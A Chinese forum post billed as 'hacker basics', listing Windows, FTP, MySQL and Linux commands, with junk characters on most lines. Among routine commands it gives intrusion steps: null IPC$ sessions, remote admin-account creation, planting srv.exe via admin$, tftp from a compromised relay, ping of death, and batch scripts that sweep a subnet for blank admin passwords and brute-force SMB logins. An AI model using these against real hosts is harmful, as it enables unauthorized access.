黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
( j, q0 w: P' f% `& o+ H( Mnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
! u9 q$ }4 e, Y( x+ |net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
0 B7 g% i1 l$ k9 H3 x& f7 B! Nnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: 0 J$ @% H. [% w* D0 w" V0 J" @
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 9 T  |" t5 W4 `8 o% V  i, p, C
net use h: /del 删除映射对方到本地的为H:的映射 ) v% r' B' `: N3 ?  S
net user 用户名　密码　/add 建立用户
3 z- T+ X6 G7 Jnet user guest /active:yes 激活guest用户
1 y9 S! F6 i4 }' {  e5 Vnet user 查看有哪些用户 & Y' B/ X8 c0 ]/ `
net user 帐户名 查看帐户的属性 + h( m6 w. S# V& M4 K* D( {
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
8 M7 d, R3 X6 Z; C/ Rnet start 查看开启了哪些服务
  l6 K% Y4 ]0 q7 V/ H/ H4 [net start 服务名　 开启服务；(如:net start telnet， net start schedule)
9 e0 t" {- i. e% Ynet stop 服务名 停止某服务 8 R: x3 i# I  Z! v$ z1 ^
net time \\目标ip 查看对方时间 7 Y1 C/ x$ n) w9 d
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 , j3 W9 h) Y4 S( ^! ?
net view 查看本地局域网内开启了哪些共享 4 m% l' i; d" C1 h2 v& K
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
1 ~& L2 @1 M/ d# {1 @; W$ tnet config 显示系统网络设置
) p6 p6 D1 O. b* [( qnet logoff 断开连接的共享
4 M# ^, z+ P  snet pause 服务名 暂停某服务
4 _0 j! I+ k6 n) X3 unet send ip "文本信息" 向对方发信息
4 N  N% ?1 s  X: Xnet ver 局域网内正在使用的网络连接类型和信息
( k$ ]# T) L- Z- s' b  Nnet share 查看本地开启的共享
1 [2 x$ l. m0 I5 P  c! unet share ipc$ 开启ipc$共享
. x) i) x0 C0 C, s2 L1 u2 Tnet share ipc$ /del 删除ipc$共享
& b  _. n% g* M! H0 }) knet share c$ /del 删除C：共享
0 r+ E$ s, M) v/ F7 f, B) pnet user guest 12345 用guest用户登陆后用将密码改为12345 & X; n! J8 {' X& I- R) K6 m: p
net password 密码 更改系统登陆密码 9 X: C5 O: _" q- |& `4 M" [
netstat -a 查看开启了哪些端口,常用netstat -an
& c! f* K7 c1 m3 V7 C/ anetstat -n 查看端口的网络连接情况，常用netstat -an * G/ T. j( U1 w( x8 G4 I
netstat -v 查看正在进行的工作 : x' ?2 R8 {+ U; K' M$ u/ z
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） " R9 x4 N( @9 ~5 Z, Q
netstat -s 查看正在使用的所有协议使用情况
: P& ^. f0 t+ cnbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 0 C9 S- \( y$ h1 G3 {
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
+ K! U9 T0 q' b3 x" F1 L. k. zping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
8 L# q$ H' K3 \1 E7 ^ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
0 w7 F- p% p" [% c% O5 N' Gipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
0 E" I4 U# U  B( A: g; N! Ftlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 2 `/ `/ k# k. q+ X/ ^0 {* s
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 5 h& v3 x3 p  H# Y2 H' y  K5 P  M( o
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 , |  A  M' q: d, [* A  ]* D- b
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
" O% P" ~; a8 R: r& k' [7 X. i% cmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
. [$ s6 X0 e  ]7 Gfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 $ B5 L! q" F) T4 q; g' e# T
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
; W; c$ d/ q' Y: Jat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 0 i1 R% i1 s- v' g9 ]6 t# E. F
at id号 /delete 停止某个已注册的计划任务 % x; l. }" ~  E& \& X# r
at 查看所有的计划任务 - A7 z  o4 q4 C/ L! N
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
( a$ d4 A5 v  V1 Q8 C9 W8 S& efinger username @host 查看最近有哪些用户登陆 ' t' u& ^! o, J1 k( {/ w
telnet ip 端口 远和登陆服务器,默认端口为23
) I1 x+ x/ @; T+ y" p0 y, x9 g* D/ ]open ip 连接到IP（属telnet登陆后的命令）
4 N" K- Y5 Q: ]9 c) Ftelnet 在本机上直接键入telnet 将进入本机的telnet
, r9 m& T5 f6 q& E" \copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 1 D! ~9 [  G: |6 d2 f" x( S+ y. f
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 ! f- L& d! M" t& W& P
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
: e5 C5 U- F* |( F8 S' }copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： % B; K" x/ B  f
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 ! j4 H4 A4 y; `' ]3 H
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
; @' x$ u  C' F) s4 D. z' vtftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 6 X# M- B, o$ E9 E% _: i
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) " D, c" `/ v% o  ^" I0 c1 s
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
; Y- K8 _/ }. m) d6 Aarp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
. h5 ]- n" v% N0 Zstart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
' u& G8 k; I$ o/ F3 W/ j5 }  P. omem 查看cpu使用情况
* m/ \# _. M" g/ battrib 文件名(目录名) 查看某文件（目录）的属性
6 M" Z9 E% B' t+ D$ s4 xattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 # t# T: E3 A( S6 B' T
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 1 t" ?0 ^0 Y! o% K: O
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 ! c5 p' B7 _7 _! B3 G
set 指定环境变量名称=要指派给变量的字符 设置环境变量 5 |+ w# ?* Y0 c' ]
set 显示当前所有的环境变量 ! M# `4 e9 N) I# D0 d
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 9 b1 U; X6 Z6 `1 R$ l! w; h  \
pause 暂停批处理程序，并显示出：请按任意键继续.... ; Q7 L0 P7 J* h: ?' W3 J$ ]
if 在批处理程序中执行条件处理（更多说明见if命令及变量） / r4 y# u* y" b+ J% u
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） / O9 T* f/ L( p) ]$ r
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） , w3 |9 _( U) s: B! p  {( f
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
3 b6 i$ I" F  z1 ~6 xecho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
1 M( R) D/ n7 v! M. `" d1 o# |echo 信息 在屏幕上显示出信息
$ g: n/ v- [5 W: ^) Secho 信息 >> pass.txt 将"信息"保存到pass.txt文件中 1 H1 \# A9 H. I5 W
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
3 d+ \/ _* L1 jfind 文件名 查找某文件
0 s: _& U' K, S* ?title 标题名字 更改CMD窗口标题名字 4 c$ G: Q) y$ g, h
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 7 b3 d2 `3 c  c# F3 _+ m
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
5 q4 m1 j& P, j2 @$ G& D5 d( lprint 文件名 打印文本文件
+ X/ T: f" ~1 h6 xver 在DOS窗口下显示版本信息 # q6 U  A' n2 L% g( w9 Q/ m7 ]  ?
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） / P4 v# M" Z3 a$ L. u0 h* p
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS - ^$ p5 m0 u) ~1 B4 c% j$ h% s5 ~( W
md　目录名 创建目录 4 ]! I: B" Y/ {! ^2 e# B
replace 源文件　要替换文件的目录 替换文件 ! W. L! Q4 ~: h
ren 原文件名　新文件名 重命名文件名
6 J0 Q; Q2 P4 G4 p/ M0 ?tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
: A' [. d* R! S" ]type 文件名 显示文本文件的内容 : u' M) C" ?) i5 X- N7 w$ g
more 文件名 逐屏显示输出文件
( t( T  C- ]% J. s# l& X' v- {doskey 要锁定的命令＝字符  b; k0 B: f. M! e) n5 i4 ?0 E2 D. k
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= 2 K. z8 _% i6 [  x! u: g
taskmgr 调出任务管理器
& e3 k1 K7 T6 ^2 s" v0 t( Schkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
1 {/ w' K( O( W& Mtlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 * z9 t! ~% f0 V' j' W. r1 t% N
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
& ^9 T# Q4 F: m9 b, R$ N; dpath 路径\可执行文件的文件名 为可执行文件设置一个路径。
8 S. W0 \0 E3 C  d! K1 X& Rcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? ; M! W0 ~* i# Z! T0 d; [  W; h  E  w
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
8 y0 u. P4 X6 C6 ^regedit /e 注册表文件名 导出注册表
+ e) I8 j0 @  D5 }6 pcacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 5 _7 `3 k& C( K- c( M2 C
cacls 文件名 查看文件的访问用户权限列表 * s( _; E4 j% p5 j3 A
REM 文本内容 在批处理文件中添加注解
: K" a. J/ i# ]% ~. P/ d8 Fnetsh 查看或更改本地网络配置情况0 H8 K3 r4 m0 T  ?8 Y$ t/ W
IIS服务命令：
3 g5 |1 i% \- X% k$ ~8 l( \- ]iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
) B% r% S. {8 t; m- v  ~4 E) oiisreset /start或stop 启动（停止）所有Internet服务 - f. }- V1 k0 n4 Z# ^3 g
iisreset /restart 停止然后重新启动所有Internet服务
! q* n8 V: o: p8 R7 Ziisreset /status 显示所有Internet服务状态
$ d$ J( o( n" giisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
+ h6 d$ J3 I8 I. u3 U8 Giisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
  U4 k- Z: i/ i' P3 Aiisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 2 X$ ~+ B8 F! T5 M0 p1 A4 @5 M
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
1 Q/ x; b: C8 SFTP 命令： (后面有详细说明内容)
4 n" O# K! [$ n1 yftp的命令行格式为:: [2 x: g- x3 ?4 @; K, ?2 J
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
; _" u% y5 @7 D& |$ H－d 使用调试方式。 ! @3 F6 G  r8 i. s- {: g
－n 限制ftp的自动登录,即不使用.netrc文件。
, a7 k4 Q- \$ s－g 取消全局文件名。 : h/ {% R& c. J4 R% z& }
help [命令] 或 ？[命令] 查看命令说明 6 j, {. w9 D' A$ m2 u
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
% j8 K  N2 ^: w* A* H/ xpwd 列出当前远端主机目录 : @7 F9 g4 y1 u
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 ! l9 `* H6 k; b, b# ~' x3 b
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
3 w) [: }2 H+ c7 w- Gmget [remote-files] 从远端主机接收一批文件至本地主机
4 t- [" a/ n: M) Rmput local-files 将本地主机中一批文件传送至远端主机 7 ]9 y% t. p" H. h( k
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件   R4 v. y2 m: t- r- K
ascii 设定以ASCII方式传送文件(缺省值) 3 {3 Q4 Z0 p* v4 k5 G$ K6 M4 \
bin 或 image 设定以二进制方式传送文件
9 I# ^3 f; V. k% m8 Y5 s3 sbell 每完成一次文件传送,报警提示 - n& T7 v+ E" P+ T. S
cdup 返回上一级目录
5 O& z4 @$ `" X+ J( X) {close 中断与远程服务器的ftp会话(与open对应)
; A* w' r. d! x* i* D* jopen host[port] 建立指定ftp服务器连接,可指定连接端口 6 u4 O' M% r6 t  w( c$ @4 b
delete 删除远端主机中的文件 ! i6 E3 ^) T  e6 ]  Q) [
mdelete [remote-files] 删除一批文件
. g: v$ J2 i) d! d2 s1 b. S+ |mkdir directory-name 在远端主机中建立目录
* o; |* w1 d3 d0 R2 A9 O4 ^rename [from] [to] 改变远端主机中的文件名 - A2 F4 m# l  p1 _
rmdir directory-name 删除远端主机中的目录
% E+ w+ Y5 ~2 W% I% xstatus 显示当前FTP的状态 / A0 V. ^' Q, J& l7 P/ C- Y) o
system 显示远端主机系统类型
+ m, A8 g* _9 m! N0 cuser user-name [password] [account] 重新以别的用户名登录远端主机
& W+ u6 h. Y1 O5 A; T# `1 Fopen host [port] 重新建立一个新的连接
5 P, g; K1 R# }, s; L) Vprompt 交互提示模式
% \. A3 r0 R8 ^& A* Umacdef 定义宏命令 3 T7 |/ o; l! k& N2 u: i1 m" t9 _
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录   r7 f. ~4 z, W5 B
chmod 改变远端主机的文件权限
  [: p6 E- ^0 Qcase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
( ]* \( ~/ h9 U+ c+ K' u, Xcd remote－dir 进入远程主机目录 . ~  }  U! x+ j; j- n
cdup 进入远程主机目录的父目录   J9 n' z( m6 g5 y/ ]9 _9 E
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip ' W. s+ j5 ^9 y" _9 I. g
MYSQL 命令：
1 `2 v* z) g2 w# \mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
* D: O% |! ^9 V* O  k7 P; e（例：mysql -h110.110.110.110 -Uroot -P123456 # W, V# ^! P* F7 d. h5 w3 e% h+ t
注:u与root可以不用加空格，其它也一样） 7 f( |6 f# u$ K+ `6 {5 J; P
exit 退出MYSQL
0 z( ^% h/ N5 C7 }mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
1 x5 s* g5 A/ _) \+ ~grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
- d  J  ]$ k+ O0 w4 s2 E* |8 hshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
  z0 C" L6 V- \! i, c5 O) Luse mysql；
( R& X" t- i' L% M0 i, J( qshow tables; 显示库中的数据表 0 y! l- J  m2 P' ^+ y; n, V
describe 表名; 显示数据表的结构
  N( B( l, s$ _2 ]$ V6 c% p& e+ ecreate database 库名; 建库 + }- k" [! r" l, A4 P  f/ P& \
use 库名；  C1 h  S. f  W' R% I
create table 表名 (字段设定列表)； 建表 ! U: u/ w2 G$ M1 \: {/ M+ f
drop database 库名; " _5 [) u5 l/ f8 P6 S
drop table 表名； 删库和删表 ! m) @" _4 Z1 a* ?
delete from 表名; 将表中记录清空
6 m- x  u4 c! s' z" ]/ Mselect * from 表名; 显示表中的记录 3 K. v0 s2 r; U- \! @- G" v9 I
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
2 f, }. J, a$ @4 V# u- n0 b! l2 ^win2003系统下新增命令（实用部份）：
; {8 r; I0 }/ H- e0 Z) @, }shutdown /参数 关闭或重启本地或远程主机。
* [1 t4 x5 s5 _& h! w) z参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
& N" `. r% i) j! S) ~例：shutdown /r /t 0 立即重启本地主机（无延时） 6 f- q3 ?  e: e
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。- E7 _  T' b2 C
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 9 T, l/ Y! H! _+ Y
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
+ i# p4 v+ ?/ p0 d5 `. h参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程. V  k0 c" O0 E' G9 u7 X0 a2 e  F
Linux系统下基本命令： 要区分大小写" N$ {6 |2 J/ m
uname 显示版本信息（同win2K的 ver）
% V: j3 ^+ x0 v1 d+ Jdir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
+ h. u+ g) s. h3 g, x$ L* hpwd 查询当前所在的目录位置
" l/ k4 l! X4 A" o8 {8 k2 kcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 9 Y3 p8 _% n+ ^/ s
cat 文件名 查看文件内容 ! u, ?% b; g5 a) ]# d
cat >abc.txt 往abc.txt文件中写上内容。 " a8 F# {$ s3 z7 e& h
more 文件名 以一页一页的方式显示一个文本文件。 8 K) C- y9 ?9 P' ?/ P9 ?
cp 复制文件 1 ]( b! E* ]( v! J. U1 P: m9 M, S) l
mv 移动文件 & s9 J4 x) _7 k( }4 m
rm 文件名 删除文件，rm -a 目录名删除目录及子目录 " j* x' p8 `. `7 J: M% c% Q
mkdir 目录名 建立目录
/ Z2 q" M) B4 r- krmdir 删除子目录，目录内没有文档。
, B* y* E+ Q+ M+ xchmod 设定档案或目录的存取权限
8 U2 l6 s0 L7 s9 B0 Sgrep 在档案中查找字符串 ) N2 ^! ~0 Z6 N2 x
diff 档案文件比较 0 b6 r# N8 T7 S, [+ o
find 档案搜寻 0 G/ z. q: L( S) y% q1 }/ V4 S
date 现在的日期、时间
# ]) c9 H+ N3 ^$ p- cwho 查询目前和你使用同一台机器的人以及Login时间地点
$ @7 F+ |8 v9 a2 c! s8 U. ~& c: Xw 查询目前上机者的详细资料 / L! ~, a5 m; l8 @9 V7 s) L
whoami 查看自己的帐号名称
) s; N4 N; h& {2 x6 t5 M; igroups 查看某人的Group # e1 \, p. A; W/ e  y4 H1 j& |
passwd 更改密码 5 V  \. _6 J. C& F, ~! ^% @- h9 M
history 查看自己下过的命令 ) ^5 [/ ^8 ?  l5 I& @4 O) j' Z
ps 显示进程状态
" t+ X/ n. o: M/ x$ b) ckill 停止某进程 / I1 u4 x" A5 T2 t8 y0 \# V( n, j
gcc 黑客通常用它来编译C语言写的文件
* V# y4 a5 P; V( c1 R+ Osu 权限转换为指定使用者
2 H' L. V7 W0 \' Ytelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
* j+ V2 w; ^$ n. w7 D: @ftp ftp连接上某服务器（同win2K
* B+ H9 ?8 j: y) M2 e5 g附：批处理命令与变量
$ z& P* O8 _( h: Q! a1：for命令及变量 基本格式：
$ }) f0 \7 G, l( a  c& kFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。- o$ @2 J, F# i% {, A& |
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3& i3 K- D# J2 X9 c/ V9 y
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
/ z2 L$ Q8 ?+ |+ p$ ?8 pcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
9 P; m5 F4 D0 Xcommand_parameters：为特定命令指定参数或命令行开关+ h8 e) q( L  d; q7 ]2 s; D
IN (set)：指在(set)中取值；DO command ：指执行command$ s3 r4 H% V, E: b
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 6 n) Z5 @( I) E$ j  [' o
用法举例：
/ d. R7 r: i. F@echo off 5 \4 E+ y3 i4 C3 k9 r
echo 用法格式：test.bat *.*.* > test.txt
. o$ x% @$ j( o4 j; Ufor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
% X2 F: I1 t0 n2 g存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。* z7 n7 K$ S& N# ~8 k9 }5 J3 @$ {
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 7 e4 B$ t8 m& y8 q
@echo off - D, F2 }0 M" S. K* C9 U
echo 用法格式：ok.bat ip 3 K" B+ K) x+ K7 ]* B
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 ; q& O6 X& ]% E% L, K
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。4 `  X$ p/ `' [$ u; A5 o
2：if命令及变量 基本格式： 5 s' g8 R( l8 o: F
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。4 I- j+ V; `6 a# U, k* |( \
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
$ j" Y2 W9 |$ |8 s# r: P/ E6 c, L! q0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 . f: z5 B4 a3 N  a8 {; u; o2 ]- R
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。* A( C! @8 m+ [) R
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） 7 a( t) S* `6 c& g0 N# T
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
- M# T2 ]8 R/ y0 V9 V+ P例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
3 M( [# e* {9 W1 G+ c" AIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”